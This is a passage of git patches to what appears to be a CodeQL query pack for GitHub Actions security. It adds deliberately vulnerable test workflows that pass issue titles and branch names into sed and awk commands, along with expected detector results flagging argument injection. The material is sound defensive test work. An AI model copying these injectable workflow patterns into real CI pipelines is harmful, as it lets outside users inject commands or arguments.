file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -870,11 +879,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -935,8 +944,11 @@ cfgNodes | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -1047,7 +1059,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | @@ -1108,8 +1120,11 @@ dfNodes | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -1222,7 +1237,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:41:23 | .github/workflows/poisonable_steps.yml@5:5:41:23 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | @@ -1283,8 +1298,11 @@ nodeLocations | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:9:41:23 | .github/workflows/poisonable_steps.yml@41:9:41:23 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -1306,7 +1324,7 @@ scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 3f2f30a78a03..09e540a0f1b0 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -17,6 +17,14 @@ jobs: - run: awk "BEGIN {$TITLE}" - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json - run: | - # We consider | as a shell pipe so this one is not reported yet until - # we can better identify all the commands in a shell script sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json + - run: | + sed -e 's##${TITLE}#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##TITLE#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index b5d25bf0d135..b5df9a2cbd3c 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -3,6 +3,8 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | @@ -10,6 +12,9 @@ nodes | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | @@ -17,3 +22,6 @@ subpaths | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index dfbf87174cc1..73413f51a392 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -3,6 +3,8 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | @@ -10,5 +12,8 @@ nodes | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | subpaths #select From 90efdc7deb85f3074f595dd4985ca7000d5820dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 12:47:16 +0200 Subject: [PATCH 447/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3a09bb016744..1c4415a305de 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.30 +version: 0.1.31 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b89b197da04b..9b49717942b5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.30 +version: 0.1.31 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8cf1a6afa7755cedad993fec7d9957023abda72f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 15:48:57 +0200 Subject: [PATCH 448/707] feat(bash): Add support for `cat hazelcast/.github/java-config.env >> $GITHUB_ENV` --- ql/lib/codeql/actions/Helper.qll | 26 ++++++++ .../security/EnvPathInjectionQuery.qll | 43 ++++++++----- .../actions/security/EnvVarInjectionQuery.qll | 48 ++++++++++----- .../security/OutputClobberingQuery.qll | 60 ++++++++++++------- .../CWE-077/.github/workflows/test10.yml | 28 +++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 4 ++ .../CWE-077/EnvVarInjectionMedium.expected | 3 + 7 files changed, 158 insertions(+), 54 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f177c645dbdc..2953817de6b8 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -212,6 +212,32 @@ predicate writeToGitHubPath(Run run, string 